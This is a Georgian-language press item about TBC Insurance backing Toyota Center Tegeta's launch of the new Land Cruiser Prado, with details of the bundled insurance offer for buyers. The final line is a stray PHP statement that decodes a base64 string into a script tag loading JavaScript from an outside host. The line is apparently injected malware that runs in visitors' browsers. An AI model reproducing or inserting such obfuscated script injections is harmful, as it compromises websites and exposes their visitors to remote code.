celsiusi
ავერსი შნაიდერი

"თიბისი დაზღვევის” მხარდაჭერით, “ტოიოტა ცენტრ თეგეტამ” ახალი Land Cruiser Prado წარადგინა. სრულიად განახლებული Land Cruiser Prado-ს პრეზენტაცია ბათუმსა და საირმეში შედგა და ახალი Prado უკვე ხელმისაწვდომია "ტოიოტა ცენტრ თეგეტასა” და ,,ტოიოტა ცენტრ ბათუმში.”

"ჩვენთვისროგორც სადაზღვევო ბაზარზე ლიდერი კომპანიისთვისმნიშველოვანია ისეთ კომპანიებთან თანამშრომლობაროგორიც "ტოიტა ცენტრი თეგეტაა” , მოხარულები ვართრომ ახალი პრადოს პრეზენტაციის მხარდამჭერები ვართ. “ტოიოტა ცენტრ თეგეტასთან” ხანგრძლივი პარტნიორობა გვაკავშირებსრადგან მათთვისისევე როგორც ჩვენთვისმთავარი მიზანი მომხმარებლებისთვის ხარისხისა და კომფორტის შეთავაზებაა.” - აცხადებს “თიბისი დაზღვევის” საცალო, მცირე და მიკრო-ბიზნესის დირექტორი ივანე კახაძე.

"ტოიოტა ცენტრ თეგეტასა ” და "ტოიოტა ცენტრ ბათუმში” ახალი Land Cruiser Prado-ს შეძენისას, მომხმარებლები "ტოიოტა კასკოს” ფარგლებში, ,,თიბისი დაზღვევისგან” სპეციალურ პირობას მიიღებენ.

პირობის მიხედვით, ,,ტოიოტა კასკოს” დაზღვევას საჩუქრად მოჰყვება მესამე პირის პასუხისმგებლობის, მძღოლისა და მგზავრების დაზღვევა. ამასთან, საქართველოს გარდა, მძღოლებს დაზღვევით სარგებლობა შეეძლებათ სომხეთის, აზერბაიჯანისა და თურქეთის ტერიტორიებზე;

პარალელურად, 5 წლის განმავლობაში, ისარგებლებენ ავტომობილის შეფასება-შეკეთების სერვისით ტოიოტას ავტორიზებულ სერვისცენტრში;

ასევე, მიიღებენ ფასდაკლებას ულიმიტო რეცხვაზე "თიბისი დაზღვევის” პარტნიორ სამრეცხაოებში.

135
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");